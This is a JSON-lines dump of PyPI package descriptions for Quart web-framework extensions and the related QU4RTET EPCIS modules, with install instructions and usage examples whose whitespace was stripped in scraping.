appropriate headers.InstallationIf you use pip then installation is simply:$pipinstallquart-compressor, if you want the latest github version:$pipinstallgit+git://github.com/AceFire6/quart-compress.gitUsing Quart-CompressQuart-Compress is incredibly simple to use. In order to start gzip'ing your Quart application's assets, the first thing to do is let Quart-Compress know about yourquart.Quartapplication object.fromquartimportQuartfromquart_compressimportCompressapp=Quart(__name__)Compress(app)In many cases, however, one cannot expect a Quart instance to be ready at import time, and a common pattern is to return a Quart instance from within a function only after other configuration details have been taken care of. In these cases, Quart-Compress provides a simple function,quart_compress.Compress.init_app, which takes your application as an argument.fromquartimportQuartfromquart_compressimportCompresscompress=Compress()defstart_app():app=Quart(__name__)compress.init_app(app)returnappIn terms of automatically compressing your assets using gzip, passing yourquart.Quartobject to thequart_compress.Compressobject is all that needs to be done.OptionsWithin your Quart application's settings you can provide the following settings to control the behavior of Quart-Compress. None of the settings are required.OptionDescriptionDefaultCOMPRESS_MIMETYPESSet the list of mimetypes to compress here.['text/html','text/css','text/xml','application/json','application/javascript']COMPRESS_LEVELSpecifies the gzip compression level.6COMPRESS_MIN_SIZESpecifies the minimum file size threshold for compressing files.500COMPRESS_CACHE_KEYSpecifies the cache key method for lookup/storage of response data.NoneCOMPRESS_CACHE_BACKENDSpecified the backend for storing the cached response data.NoneCOMPRESS_REGISTERSpecifies if compression should be automatically registered.True"} +{"package": "quart-compress2", "pacakge-description": "Quart-CompressDescriptionQuart is a Python ASGI web microframework.\nIt is intended to provide the easiest way to use asyncio functionality in a web context, especially with existing Flask apps.\nThis is possible as the Quart API is a superset of the Flask API.--Quart ProjectAs I wanted to seamlessly migrate from Flask to Quart and noticed, that there are a few issues in usingFlask-Compresstogether with Quart, I decided to create my own Quart-Compress packages, which is based on the Flask-Compress project.InstallationInstalling the package is as easy as:$pipinstallquart-compress2UsageTo compress your Quart responses, you only need to compress your Quart object at the beginning using theCompressclass:fromquartimportQuartfromquart_compressimportCompressapp=Quart(__name__)Compress(app)"} +{"package": "quartcord", "pacakge-description": "quartcordTable of ContentsAboutInstallationRequirementsSetupBasic ExampleDocumentationSupportCreditsLicenseAboutDiscord OAuth2 extension for Quart.InstallationRequirementsQuartpyjwtaiohttpoauthlibdiscord.pycachetoolsAsync-OAuthlibSetupTo install current latest release you can use following command:python-mpipinstallquartcordBasic ExamplefromquartimportQuart,redirect,url_forfromquartcordimportDiscordOAuth2Session,requires_authorization,Unauthorizedapp=Quart(__name__)app.secret_key=b\"random bytes representing quart secret key\"app.config[\"DISCORD_CLIENT_ID\"]=490732332240863233# Discord client ID.app.config[\"DISCORD_CLIENT_SECRET\"]=\"\"# Discord client secret.app.config[\"DISCORD_REDIRECT_URI\"]=\"\"# URL to your callback endpoint.app.config[\"DISCORD_BOT_TOKEN\"]=\"\"# Required to access BOT resources.discord=DiscordOAuth2Session(app)@app.route(\"/login/\")asyncdeflogin():returnawaitdiscord.create_session()@app.route(\"/callback/\")asyncdefcallback():awaitdiscord.callback()returnredirect(url_for(\".me\"))@app.errorhandler(Unauthorized)asyncdefredirect_unauthorized(e):returnredirect(url_for(\"login\"))@app.route(\"/me/\")@requires_authorizationasyncdefme():user=awaitdiscord.fetch_user()returnf\"\"\"{user.name}\"\"\"if__name__==\"__main__\":app.run()DocumentationHead over todocumentationfor full API reference.SupportProject IssuesFumeStop Community Server(Help > quartcord)CreditsFlask-DiscordQuart-Discord(Do not use; no longer maintained)LicenseMIT LicenseCopyright \u00a9 2023 Sayan \"Sn1F3rt\" Bhattacharyya"} +{"package": "quart-cors", "pacakge-description": "Quart-CORS is an extension forQuartto enable and controlCross\nOrigin Resource Sharing, CORS (also\nknown as access control).CORS is required to share resources in browsers due to theSame\nOrigin Policywhich prevents resources being used from a different origin. An origin\nin this case is defined as the scheme, host and port combined and a\nresource corresponds to a path.In practice the Same Origin Policy means that a browser visitinghttp://quart.comwill prevent the response ofGEThttp://api.combeing read. It will also prevent requests such asPOSThttp://api.com. Note that CORS applies to browser initiated\nrequests, non-browser clients such asrequestsare not subject to\nCORS restrictions.CORS allows a server to indicate to a browser that certain resources\ncan be used, contrary to the Same Origin Policy. It does so via\naccess-control headers that inform the browser how the resource can be\nused. For GET requests these headers are sent in the response. For\nnon-GET requests the browser must ask the server for the\naccess-control headers before sending the actual request, it does so\nvia a preflight OPTIONS request.The Same Origin Policy does not apply to WebSockets, and hence there\nis no need for CORS. Instead the server alone is responsible for\ndeciding if the WebSocket is allowed and it should do so by inspecting\nthe WebSocket-request origin header.Simple (GET) requests should return CORS headers specifying the\norigins that are allowed to use the resource (response). This can be\nany origin,*(wildcard), or a list of specific origins. The\nresponse should also include a CORS header specifying whether\nresponse-credentials e.g. cookies can be used. Note that if credential\nsharing is allowed the allowed origins must be specific and not a\nwildcard.Preflight requests should return CORS headers specifying the origins\nallowed to use the resource, the methods and headers allowed to be\nsent in a request to the resource, whether response credentials can be\nused, and finally which response headers can be used.Note that certain actions are allowed in the Same Origin Policy such\nas embedding e.g.and simple\nPOSTs. For the purposes of this readme though these complications are\nignored.The CORS access control response headers are,Header nameMeaningAccess-Control-Allow-OriginOrigins that are allowed to use the resource.Access-Control-Allow-CredentialsCan credentials be shared.Access-Control-Allow-MethodsMethods that may be used in requests to the resource.Access-Control-Allow-HeadersHeaders that may be sent in requests to the resource.Access-Control-Expose-HeadersHeaders that may be read in the response from the resource.Access-Control-Max-AgeMaximum age to cache the CORS headers for the resource.Quart-CORS uses the same naming (without the Access-Control prefix)\nfor it\u2019s arguments and settings when they relate to the same meaning.UsageTo add CORS access control headers to all of the routes in the\napplication, simply apply thecorsfunction to the application, or\nto a specific blueprint,app=Quart(__name__)app=cors(app,**settings)blueprint=Blueprint(__name__)blueprint=cors(blueprint,**settings)alternatively if you wish to add CORS selectively by resource, apply\ntheroute_corsfunction to a route, or thewebsocket_corsfunction to a WebSocket,@app.route('/')@route_cors(**settings)asyncdefhandler():...@app.websocket('/')@websocket_cors(allow_origin=...)asyncdefhandler():...Thesettingsare these arguments,Argumenttypeallow_originUnion[Set[Union[Pattern, str]], Union[Pattern, str]]allow_credentialsboolallow_methodsUnion[Set[str], str]allow_headersUnion[Set[str], str]expose_headersUnion[Set[str], str]max_ageUnion[int, flot, timedelta]which correspond to the CORS headers noted above. Note that all\nsettings are optional and defaults can be specified in the application\nconfiguration,Configuration keytypeQUART_CORS_ALLOW_ORIGINSet[Union[Pattern, str]]QUART_CORS_ALLOW_CREDENTIALSboolQUART_CORS_ALLOW_METHODSSet[str]QUART_CORS_ALLOW_HEADERSSet[str]QUART_CORS_EXPOSE_HEADERSSet[str]QUART_CORS_MAX_AGEfloatThewebsocket_corsdecorator only takes anallow_originargument which defines the origins that are allowed to use the\nWebSocket. A WebSocket request from a disallowed origin will be\nresponded to with a 400 response.Theallow_originorigins should be the origin only (no path, query\nstrings or fragments) i.e.https://quart.comnothttps://quart.com/.Thecors_exemptdecorator can be used in conjunction withcorsto exempt a websocket handler or view function from cors.Simple examplesTo allow an app to be used from any origin (not recommended as it is\ntoo permissive),app=Quart(__name__)app=cors(app,allow_origin=\"*\")To allow a route or WebSocket to be used from another specific domain,https://quart.com,@app.route('/')@route_cors(allow_origin=\"https://quart.com\")asyncdefhandler():...@app.websocket('/')@websocket_cors(allow_origin=\"https://quart.com\")asyncdefhandler():...To allow a route or WebSocket to be used from any subdomain (but not\nthe domain itself) ofquart.com,@app.route('/')@route_cors(allow_origin=re.compile(r\"https:\\/\\/.*\\.quart\\.com\"))asyncdefhandler():...@app.websocket('/')@websocket_cors(allow_origin=re.compile(r\"https:\\/\\/.*\\.quart\\.com\"))asyncdefhandler():...To allow a JSON POST request to an API route, fromhttps://quart.com,@app.route('/',methods=[\"POST\"])@route_cors(allow_headers=[\"content-type\"],allow_methods=[\"POST\"],allow_origin=[\"https://quart.com\"],)asyncdefhandler():data=awaitrequest.get_json()...ContributingQuart-CORS is developed onGitHub. You are very welcome to\nopenissuesor\nproposemerge requests.TestingThe best way to test Quart-CORS is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThis README is the best place to start, after that try opening anissue."} +{"package": "quart-csrf", "pacakge-description": "Quart-CsrfQuart-Csrf is an extension forQuartto provide CSRF protection.\nThe code is taked fromFlask-WTF.UsageTo enable CSRF protection globally for a Quart app, you have to create an CSRFProtect and\ninitialise it with the application,fromquart_csrfimportCSRFProtectapp=Quart(__name__)CSRFProtect(app)or via the factory pattern,csrf=CSRFProtect()defcreate_app():app=Quart(__name__)csrf.init_app(app)returnappNote: CSRF protection requires a secret key to securely sign the token. By default this will\nuse the QUART app's SECRET_KEY. If you'd like to use a separate token you can set QUART_CSRF_SECRET_KEY.HTML Forms: render a hidden input with the token in the form.JavaScript Requests: When sending an AJAX request, add the X-CSRFToken header to it. For example, in jQuery you can configure all requests to send the token.ContributingQuart-Csrf is developed onGitLab. You are very welcome to\nopenissuesor\nproposemerge requests.HelpThis README is the best place to start, after that try opening anissue."} +{"package": "quart-db", "pacakge-description": "Quart-DB is a Quart extension that provides managed connection(s) to\npostgresql or sqlite database(s).QuickstartQuart-DB is used by associating it with an app and a DB (via a URL)\nand then utilising theg.connectionconnection,fromquartimportg,Quart,websocketfromquart_dbimportQuartDBapp=Quart(__name__)db=QuartDB(app,url=\"postgresql://user:pass@localhost:5432/db_name\")@app.get(\"/\")asyncdefget_count(id:int):result=awaitg.connection.fetch_val(\"SELECT COUNT(*) FROM tbl WHERE id = :id\",{\"id\":id},)return{\"count\":result}@app.post(\"/\")asyncdefset_with_transaction():asyncwithg.connection.transaction():awaitdb.execute(\"UPDATE tbl SET done = :done\",{\"done\":True})...return{}@app.get(\"/explicit\")asyncdefexplicit_usage():asyncwithdb.connection()asconnection:...ContributingQuart-DB is developed onGitHub. If you come across an issue,\nor have a feature request please open anissue. If you want to\ncontribute a fix or the feature-implementation please do (typo fixes\nwelcome), by proposing amerge request.TestingThe best way to test Quart-DB is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-DBdocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-depends", "pacakge-description": "quart-dependsTable of Contentsquart-dependsInstallationLicenseInstallationpip install quart-dependsLicensequart-dependsis distributed under the terms of theMITlicense."} +{"package": "quart-discord-oauth", "pacakge-description": "No description available on PyPI."} +{"package": "quart-doh", "pacakge-description": "quart-dohquart-doh is a simple DOH (DNS Over HTTPS) server. It resolves DNS query on HTTP.ImplementationRFC 8484https://www.rfc-editor.org/rfc/rfc8484.txtJson implementationhttps://developers.cloudflare.com/1.1.1.1/dns-over-https/json-format/Quick startopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodespipenv sync -dpipenv run doh_serverUse with Firefoxin about:config edit::network.trr.mode;3\nnetwork.trr.uri;https://127.0.0.1/dns-queryFor the URI, add your URI for your reverse proxy serving your Quart app.Firefox seems to only accept port 443.InstallationVia Pippip install quart-dohThen :Generate a certificate and a private key :openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesdoh-server --debug --cert [path]cert.pem --key [path]key.pemdoh-client --noverifyVia Dockeropenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesdocker build -f Dockerfile -t quart-doh/doh-server .docker run --rm -p 443:443 quart-doh/doh-serverBenchmarkMacbook Pro 2019\nProcessor 2,4 GHz Intel Core i5\nMemory 8 GB 2133 MHz LPDDR3apib -c 100 -d 60 @benchmark_get_url.txtHTTP/1.1\nDuration: 60.024 seconds\nAttempted requests: 15757\nSuccessful requests: 15757\nNon-200 results: 0\nConnections opened: 100\nSocket errors: 0\n\nThroughput: 262.511 requests/second\nAverage latency: 376.399 milliseconds\nMinimum latency: 103.082 milliseconds\nMaximum latency: 2846.580 milliseconds\nLatency std. dev: 456.340 milliseconds\n50% latency: 202.483 milliseconds\n90% latency: 862.423 milliseconds\n98% latency: 2044.469 milliseconds\n99% latency: 2409.697 milliseconds\n\nClient CPU average: 0%\nClient CPU max: 0%\nClient memory usage: 0%\n\nTotal bytes sent: 2.25 megabytes\nTotal bytes received: 5.08 megabytes\nSend bandwidth: 0.30 megabits / second\nReceive bandwidth: 0.68 megabits / second"} +{"package": "quarter", "pacakge-description": "quarterdatetime-like framework for dealing with financial quarters in programs."} +{"package": "quarter-lib", "pacakge-description": "No description available on PyPI."} +{"package": "quartet", "pacakge-description": "No description available on PyPI."} +{"package": "quartet_capture", "pacakge-description": ".d8888b. d8888 8888888b. 88888888888 888 888 8888888b. 8888888888\nd88P Y88b d8P888 888 Y88b 888 888 888 888 Y88b 888\n888 888 d8P 888 888 888 888 888 888 888 888 888\n888 d8P 888 888 d88P 888 888 888 888 d88P 8888888\n888 d88 888 8888888P\" 888 888 888 8888888P\" 888\n888 888 8888888888 888 888 888 888 888 T88b 888\nY88b d88P 888 888 888 Y88b. .d88P 888 T88b 888\n \"Y8888P\" 888 888 888 \"Y88888P\" 888 T88b 8888888888A capture and queuing interface for the QU4RTET open source EPCIS platform.\nThis package defines the\ngeneric structure of the QU4RTET rule engine and defines the base classes\nnecessary for use when extending the functionality of QU4RTET.DocumentationThe full documentation here includes an overall explanation and example of\nimplementing rules and steps along with installation instructions:https://serial-lab.gitlab.io/quartet_captureQuickstartInstall quartet_capturepip install quartet_captureAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_capture.apps.QuartetCaptureConfig',\n ...\n)Add quartet_capture\u2019s URL patterns:from quartet_capture import urls as quartet_capture_urls\n\nurlpatterns = [\n ...\n url(r'^', include(quartet_capture_urls)),\n ...\n]FeaturesAccepts inbound HTTP Post messages and queues them up for processing.Stores inbound messages in RabbitMQ backend for processing with the Celery Task Queue.Keeps track of messages and their processing state.Running The Unit Testssource /bin/activate\n(myenv) $ python runtests.py"} +{"package": "quartet_epcis", "pacakge-description": "Built on top of the world-class EPCPyYes python package.\nReal EPCIS support for serious people running real systems.________ ___ ___ _______ ________ ________ ___ ________\n|\\ __ \\|\\ \\ |\\ \\|\\ ___ \\ |\\ __ \\|\\ ____\\|\\ \\|\\ ____\\\n\\ \\ \\|\\ \\ \\ \\\\_\\ \\ \\ __/|\\ \\ \\|\\ \\ \\ \\___|\\ \\ \\ \\ \\___|_\n \\ \\ \\\\\\ \\ \\______ \\ \\ \\_|/_\\ \\ ____\\ \\ \\ \\ \\ \\ \\_____ \\\n \\ \\ \\\\\\ \\|_____|\\ \\ \\ \\_|\\ \\ \\ \\___|\\ \\ \\____\\ \\ \\|____|\\ \\\n \\ \\_____ \\ \\ \\__\\ \\_______\\ \\__\\ \\ \\_______\\ \\__\\____\\_\\ \\\n \\|___| \\__\\ \\|__|\\|_______|\\|__| \\|_______|\\|__|\\_________\\\n \\|__| \\|_________|The essential Open-Source EPCIS component for the QU4RTET traceability\nplatform.For more on QU4RTET seehttp://www.serial-lab.comThe quartet_epcis python package is a Django application that\ncontains the base database models necessary for the support of\nEPCIS 1.2 data persistence to an RDBMS. The quartet_epcis.parsing\npackage contains an EPCIS XML parser that will take an input stream\nof XML data and save it to a configured database back-end.The quartet_epcis.app_models directory contains a set of\nDjango ORM models that are used to define the database scheme\nand store EPCIS data in the database.DocumentationFind the latest docs here:https://serial-lab.gitlab.io/quartet_epcis/The full (pre-built )documentation is under the docs directory in this project.QuickstartInstall QU4RTET EPCISpip install quartet_epcisAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_epcis',\n ...\n)FeaturesMaintains the database schema for EPCIS 1.2 support.Parses EPCIS 1.2 XML streams to the configured backend database system.Enforces business rules around decommissioning, commissioning, aggregation,\ndisaggregation, etc.Running The Unit Testssource /bin/activate\n(myenv) $ pip install -r requirements_test.txt\n(myenv) $ python runtests.py"} +{"package": "quartet_integrations", "pacakge-description": "Third party integrations for the QU4RTET open-source EPCIS platform. For\nmore on QU4RTET and SerialLab, seethe SerialLab websitethe SerialLab website:http://serial-lab.comDocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_integrations/QuickstartInstall quartet_integrations:pip install quartet_integrationsAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_integrations.apps.QuartetIntegrationsConfig',...)Add quartet_integrations\u2019s URL patterns:fromquartet_integrationsimporturlsasquartet_integrations_urlsurlpatterns=[...url(r'^',include(quartet_integrations_urls)),...]FeaturesTODORunning TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ toxCreditsTools used in rendering this package:Cookiecuttercookiecutter-djangopackage"} +{"package": "quartet_manifest", "pacakge-description": "Reports back QU4RTET configuration and capabilities to quartet-ui.DocumentationDependenciesFirst, make sure you haveDjangoand theDjango Rest Frameworkinstalled and\nyou have an active project started. See the Django and Django Rest Framework\ndocumentation below if you are unfamiliar with this process.Modfiy settings.pyTo use quartet_manifest in a project, first, add it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'rest_framework',\n 'quartet_manifest',\n ...\n)Add the URL patternsIn your project\u2019surls.py, add quartet_manifest\u2019s URL patterns:from quartet_manifest import urls as quartet_manifest_urls\n\n\nurlpatterns = [\n ...\n path('manifest/', include('quartet_manifest.urls')),\n ...\n]Test the URLNavigate to the configured host/port and url using the structure below:http://[yourhost name]:[your port]/manifest/quartet-manifest/?format=jsonYou should get a return value as below"} +{"package": "quartet_masterdata", "pacakge-description": "GS1 CBV 1.2 Implementation for Trade Items and Location Master DataModels and APIs to support material, lot and location master data within\nQU4RTET as defined in theGS1 Core Business Vocabulary.Geo-Location/History APIsBy cross-referencing BizLocation and other information from thequartet_epcismodule,quartet_masterdataprovides full geo-location (lat, long) by\nitem by EPCIS event. This provides thequartet-uiinterface a mechanism\nby which to display mapping and geo-location visual assets.DocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_masterdata/QuickstartThe QU4RTET Master Data module comes pre-configured in the QU4RTET project;\nhowever, if you need to add it to a test installation manually peform the\nfollowing:Install quartet_masterdata:pip install quartet_masterdataAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_masterdata.apps.QuartetMasterdataConfig',\n ...\n)Add quartet_masterdata\u2019s URL patterns:from quartet_masterdata import urls as quartet_masterdata_urls\n\n\nurlpatterns = [\n ...\n url(r'^', include(quartet_masterdata_urls)),\n ...\n]FeaturesGeoLocation APIsAPI and Database Support For Product Master MaterialAPI and Database Support forRunning Tests** REQUIRES PYTHON 3 **Does the code actually work?source /bin/activate\n(myenv) $ pip install -r requirements_test.txt\n(myenv) $ python runtests.py"} +{"package": "quartet_output", "pacakge-description": "Output Rules and logic for the QU4RTET open-source EPCIS / Level-4\nsupply chain and trading-partner messaging framework.IntroThequartet_outputmodule is responsible for inspecting inbound messages\nand, based on criteria defined by users, singling out some of those messages\nfor further processing. Once a message has been filtered, it is typically\nused to create a new message from some existing EPCIS data or to simply\ncreate a new message using the same data with the intent of sending that\nmessage to another system.CriteriaThequartet_outputmodule allows users to defineEPCIS Output Criteriadefinitions. These definitions allow users to instruct the module to look\nat inbound EPCIS events and look for events that meet certain selection\ncriteria. For example, users can define criteria that would inspect all\ninboundTransaction Eventsof actionADDfrom a specificbizLocationwith aPurchase Orderbusiness transaction attached. Once an event\narrives meeting these criteria, the system allows a user to use that event\nto trigger the generation of a shipping event along with all of the serial\nnumbers for the epcs specified in the triggering event. Other scenarios are\npossible as well and, of course, users can implementRulesandStepsof\ntheir own that do just about anything once an inbound event has been filtered.Transportquartet_outputallows users to configure transport configurations using\nbothEndPointandAuthenticationInfodatabase models. These models are\nattached to the criteria that filter EPCIS events and allow the user to\nspecify where messages should be sent once an event has been filtered and\nhas triggered any outbound processing logic.DocumentationThe full documentation is located here:https://serial-lab.gitlab.io/quartet_outputQuickstartInstall quartet_outputpip install quartet_outputAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_output.apps.QuartetOutputConfig',\n ...\n)Add quartet_output\u2019s URL patterns:from quartet_output import urls as quartet_output_urls\n\n\nurlpatterns = [\n ...\n url(r'^', include(quartet_output_urls)),\n ...\n]FeaturesOutput determination allows you to create filters on inbound EPCIS data\nand determine which inbound EPCIS events trigger outbound business messaging.Define HTTP and HTTPS end points for trading partners.Define various authentication schemes for external end points.Outbound messages take advantage of thequartet_capturerule engine by\ncreating a new outbound task for every message. This puts every outbound\ntask on the Celery Task Queue- allowing you to scale your outbound messaging\nto your liking.Running The Unit Testssource /bin/activate\n(myenv) $ pip install tox\n(myenv) $ tox"} +{"package": "quartet-rnaseq-report", "pacakge-description": "MultiReport for Quartet RNAseq Report."} +{"package": "quartet_templates", "pacakge-description": "No description available on PyPI."} +{"package": "quartet_tracelink", "pacakge-description": "An EPCIS to TraceLink Codec that overcomes (or tries to) many of the\nquirks, garbage, non-standard BS and other well-known shortcomings of the Tracelink EPCIS interface.DocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_tracelink/QuickstartInstall quartet_tracelink:pip install quartet_tracelinkAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_tracelink.apps.QuartetTracelinkConfig',...)Add quartet_tracelink\u2019s URL patterns:fromquartet_tracelinkimporturlsasquartet_tracelink_urlsurlpatterns=[...url(r'^',include(quartet_tracelink_urls)),...]Running TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ toxHistory0.1.0 (2018-09-06)First release on PyPI."} +{"package": "quartet-trail", "pacakge-description": "Logs action in QuartetDocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet-trail/QuickstartInstall Quartet Trail:pip install quartet-trailAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_trail.apps.QuartetTrailConfig',...)Add Quartet Trail\u2019s URL patterns:fromquartet_trailimporturlsasquartet_trail_urlsurlpatterns=[...url(r'^',include(quartet_trail_urls)),...]FeaturesTODORunning TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ toxHistory0.1.0 (2018-11-07)First release on PyPI."} +{"package": "quartet_vrs", "pacakge-description": "A GS1-compliant VRS interface for QU4RTET, the open-source EPCIS platform.DocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_vrs/QuickstartInstall quartet_vrs:pip install quartet_vrsAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_vrs.apps.QuartetVrsConfig',...)Add quartet_vrs\u2019s URL patterns:fromquartet_vrsimporturlsasquartet_vrs_urlsurlpatterns=[...url(r'^',include(quartet_vrs_urls)),...]FeaturesREST APIOpen API SchemaImplements the full Global Lightweight Messaging Standard v1.0.2Providescheckconnectivtyendpoint.Providesverifyendpoint.Running TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ tox"} +{"package": "quart-events", "pacakge-description": "quart-eventsUsagequart_events.EventBroker loads a blueprint into Quart which allows clients to subscribe to events via a WebSockets. The app can then generate events that can be sent to all subscribed clients in real-time.Please seetest/app.pyfor an example app. This app is used when running testing via py.test but can also be run standalone.Change Log[0.4.2] - 2021-12-23Change build system from setuptools to poetry[0.4.0] - 2021-11-08add type hints and type validation with mypyrequires asyncio-multisubscriber-queue 0.3.0pytest plugin to facilitate capturing events while other tests are running; plugin name isquart_events_catcheradded optional callbackswebsocket auth improvementstoken is now seemlessly managed using the user's session datatoken has an expiration; user is disconnected from the socket upon expirationa callback is available to further validate user using other criteria (like Flask-Login)"} +{"package": "quart-flask-patch", "pacakge-description": "Quart-Flask-Patch is a Quart extension that patches Quart to work with\nFlask extensions.QuickstartQuart-Flask-Patch must be imported first in your main module, so that\nthe patching occurs before any other code is initialised. For example,\nif you want to use Flask-Login,importquart_flask_patchfromquartimportQuartimportflask_loginapp=Quart(__name__)login_manager=flask_login.LoginManager()login_manager.init_app(app)Extensions known to workThe following flask extensions are tested and known to work with\nquart,Flask-BCryptFlask-CachingFlask-KVSessionFlask-LimiterSee\nalsoQuart-Rate-LimiterFlask-LoginSee\nalsoQuart-LoginorQuart-AuthFlask-MailFlask-MakoFlask-SeasurfFlask-SQLAlchemySee alsoQuart-DBFlask-WTFExtensions known not to workThe following flask extensions have been tested are known not to work\nwith quart,Flask-CORS, as it\nusesapp.make_responsewhich must be awaited. TryQuart-CORSinstead.Flask-Restfulas it subclasses the Quart (app) class with synchronous methods\noverriding asynchronous methods. TryQuart-OpenApiorQuart-Schemainstead.CaveatsFlask extensions must use the global request proxy variable to access\nthe request, any other access e.g. via~quart.local.LocalProxy._get_current_objectwill require\nasynchronous access. To enable this the request body must be fully\nreceived before any part of the request is handled, which is a\nlimitation not present in vanilla flask.Trying to use Flask alongside Quart in the same runtime will likely\nnot work, and lead to surprising errors.The flask extension must be limited to creating routes, using the\nrequest and rendering templates. Any other more advanced functionality\nmay not work.Synchronous functions will not run in a separate thread (unlike Quart\nnormally) and hence may block the event loop.Finally the flask_patching system also relies on patching asyncio, and\nhence other implementations or event loop policies are unlikely to\nwork.ContributingQuart-Flask-Patch is developed onGitHub. If you come across\nan issue, or have a feature request please open anissue. If you want\nto contribute a fix or the feature-implementation please do (typo\nfixes welcome), by proposing amerge request.TestingThe best way to test Quart-Flask-Patch is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Flask-Patchdocumentationis the best\nplaces to start, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-github-webhook", "pacakge-description": "No description available on PyPI."} +{"package": "quartical", "pacakge-description": "QuartiCalQuartiCal is the successor to CubiCal. It implements a suite of fast radio interferometric calibration routines exploiting complex optimisation. Unlike CubiCal, QuartiCal allows for any available Jones terms to be combined. It can also be deployed on a cluster (documentation under construction).InstallationQuartiCal can be installed using pip:pip install quartical.DocumentationDocumentation is available onreadthedocs.Public BetaQuartiCal is now in public beta! That means we want you to use (and break) it as much as possible. Any bugs and feature requests can be submitted via the issue tracker."} +{"package": "quartic-sdk", "pacakge-description": "QuarticSDKQuartic SDK is Quartic.ai's external software development kit which allows users to use assets, tags, and other intelligence outside the Quartic AI Platform. Using the Quartic SDK, third party developers who have access to the Quartic AI Platform can build custom applications.InstallationInstall usingpippip install quartic-sdkto Install complete package with all supported model libraries:pip install quartic-sdk[complete]...or follow the following steps to install it from the source:git clone https://github.com/Quarticai/QuarticSDK/\npython setup.py installExampleComprehensive documentation is available athttps://quarticsdk.readthedocs.io/en/latest/Here's an example on how the Quartic SDK can be used:Getting the assets, tags, batches from the server# Assuming that the Quartic.ai server is hosted at `https://test.quartic.ai/`,# with the login credentials as username and password is \"testuser\" and `testpassword respectively,# then use APIClient in the following format.fromquartic_sdkimportAPIClientclient=APIClient(\"https://test.quartic.ai/\",username=\"testuser\",password=\"testpassword\")user_assets=client.assets()# Get the list of all assets that the user has access toasset=user_assets.get(\"name\",\"Test Asset\")# Get a specific asset with the name \"Test Asset\"asset_tags=asset.get_tags()# Gets the list of all tagsfirst_tag=asset_tags.first()# Returns the first in the list of tagsfirst_tag_data_iterator=first_tag.data(start_time=1000000,stop_time=2000000)# Returns the data present in the first tag for the time range of 1000000 to 2000000# Assuming that the Quartic.ai server is hosted at `https://test.quartic.ai/`,# with the login credentials as username and password is \"testuser\" and `testpassword respectively,# then use GraphqlClient in the following format.fromquartic_sdkimportGraphqlClientclient=GraphqlClient(url='https://test.quartic.ai/',username='testuser',password='testpassword')# Executing Query by:query='''query MyQuery {Site {idname}}'''result=client.execute_query(query=query)# To execute query asynchronously use the function below.#You should see the following result:{'data':{'Site':[{'id':'1','name':'quartic'},{'id':'8','name':'ABC site 1'},{'id':'12','name':'XYZ 123'}]}asyncdefexecute_graphql_query():query='''query MyQuery {Site {idname}}'''resp=awaitclient.execute_async_query(query=query)returnresp# Note: The above function will return a coroutine object.# Example to upload a file.query='''mutation($file: Upload!, $edge_connector: Int!, $date_format: DateTime!) {uploadTelemetryCsv(file: $file,fileName: \"123\",edgeConnector: $edge_connector,dateFormat: $date_format){taskIdstatus}}'''variables={'file':open('','rb'),'edge_connector':'edgeConnector Id','date_format':'DatTime format'}response=client.execute_query(query=query,variables=variables)DocumentationTo run the documentation locally, run the following commands in terminal:cd docs\nmake html\n\ncd docs/source\nsphinx-build -b html . _build\nopen build/html/index.htmlTest CasesTo run the behaviour test cases, run the command:aloeTo run the unit test cases, run the command:pytest"} +{"package": "quartic-solver-kapoorlabs", "pacakge-description": "quartic-solver-kapoorlabsA package containing methods for solving quartic, cubic, quadratic, and depressed equations.Thiscapedpackage was generated withCookiecutterusing@caped'scookiecutter-templatetemplate.InstallationYou can installquartic-solver-kapoorlabsviapip:pip install quartic-solver-kapoorlabsTo install latest development version :pip install git+https://github.com/Kapoorlabs-CAPED/quartic-solver.gitContributingContributions are very welcome. Tests can be run withtox, please ensure\nthe coverage at least stays the same before you submit a pull request.LicenseDistributed under the terms of theBSD-3license,\n\"quartic-solver\" is free and open source softwareIssuesIf you encounter any problems, pleasefile an issuealong with a detailed description."} +{"package": "quartic-transformer", "pacakge-description": "No description available on PyPI."} +{"package": "quart-imp", "pacakge-description": "Quart-Imppip install quart-impWhat is Quart-Imp?Quart-Imp's main purpose is to help simplify the importing of blueprints, resources, and models.\nIt has a few extra features built in to help with securing pages and password authentication.NoteQuart-Flask-Patch is required to use Quart-Imp.Generate a Quart appquart-impinitExampleproject/\n\u2514\u2500\u2500 app/\n \u251c\u2500\u2500 blueprints/\n \u2502 \u2514\u2500\u2500 www/...\n \u251c\u2500\u2500 extensions/\n \u2502 \u2514\u2500\u2500 __init__.py\n \u251c\u2500\u2500 resources/\n \u2502 \u251c\u2500\u2500 static/...\n \u2502 \u251c\u2500\u2500 templates/...\n \u2502 \u2514\u2500\u2500 routes.py\n \u2514\u2500\u2500 __init__.py# 